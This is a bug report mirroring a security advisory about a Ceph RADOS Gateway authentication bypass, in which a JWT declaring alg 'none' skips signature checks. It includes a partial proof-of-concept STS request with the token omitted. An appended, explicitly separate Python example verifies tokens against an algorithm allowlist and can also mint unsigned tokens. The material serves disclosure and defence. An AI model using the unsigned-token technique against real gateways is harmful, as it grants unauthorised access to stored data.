+++ This bug was initially created as a clone of Bug #2323274 +++

https://github.com/ceph/ceph/security/advisories/GHSA-5g9m-mmp6-93mq

Summary below:

Description

Summary

It is possible to bypass the Ceph RADOS Gateway (RGW) authentication by providing a JWT as demonstrated in the PoC. In this case Keycloak is used as the IdP.

This was found during a penetration test. Please assign a CVE and credit me with finding this vulnerability. Do not mention the customer/organisation in public reports etc. Details have also been provided to security before. As always, please fix this within 90 days as we plan to go public.

Details

It is possible to send a JWT that has "none" as the JWT alg, and by doing so the JWT signature is not checked. The vulnerability is probably in the RadosGW OIDC provider.

PoC

The HTTP request can be found below, but without the JWT:

POST / HTTP/2
Host: storage.xxx.se
User-Agent: aws-sdk-go-v2/1.18.0 os/macos lang/go/1.21.1 X:nocoverageredesign md/GOOS/darwin md/GOARCH/arm64 api/sts/1.19.0
Content-Type: application/x-www-form-urlencoded
Amz-Sdk-Invocation-Id: 30a74697-7d7e-4c02-b041-97d68156ee78
Amz-Sdk-Request: attempt=1; max=3
Content-Length: 1508
Accept-Encoding: gzip, deflate, br

Action=AssumeRoleWithWebIdentity&DurationSeconds=3600&RoleArn=arn%3Aaws%3Aiam%3A%3Aorg_pentest002%3Arole%2Fu-pentest002STS&RoleSessionName=test&Version=2011-06-15&WebIdentityToken=ey..

Impact

This was found during a penetration test. Please assign a CVE and credit me with finding this vulnerability. We can also request a CVE from MITRE.
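As an added example, not part of this bug report or of Ceph's code: a minimal stdlib-only Python JWT verifier of the kind the AssumeRoleWithWebIdentity path needs, which enforces an algorithm allowlist before touching the signature, so a token announcing alg "none" (or any unlisted algorithm) is rejected outright. It uses HS256 with a constructed shared secret so it runs offline; a real OIDC verifier in front of RGW would check the IdP's asymmetric algorithm against the IdP's published keys, and the claims and key below are constructed.

```python
import base64
import hashlib
import hmac
import json

# Algorithms this verifier accepts. "none" is never listed, so a token whose
# header announces alg "none" is refused before any signature logic runs.
# HS256 keeps the example standard-library only; a verifier in front of RGW
# would list the IdP's asymmetric algorithm (e.g. RS256) instead.
ALLOWED_ALGS = frozenset({"HS256"})

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def make_token(claims: dict, key: bytes, alg: str) -> str:
    """Build a JWT; alg "none" yields an unsigned token with an empty signature."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header).encode()) + "."
                     + b64url_encode(json.dumps(claims).encode()))
    if alg == "none":
        return signing_input + "."
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)

def verify_token(token: str, key: bytes) -> dict:
    """Return the claims only if alg is permitted and the signature verifies."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    # Allowlist first: the token's own header must never pick "none" (or any
    # other algorithm) on the verifier's behalf.
    if alg not in ALLOWED_ALGS:
        raise ValueError(f"alg {alg!r} not permitted")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(payload_b64))

def verification_outcome(token: str, key: bytes) -> str:
    """Return "accepted" or "rejected: <reason>"; usable as a log line at the STS endpoint."""
    try:
        verify_token(token, key)
        return "accepted"
    except ValueError as exc:
        return f"rejected: {exc}"
```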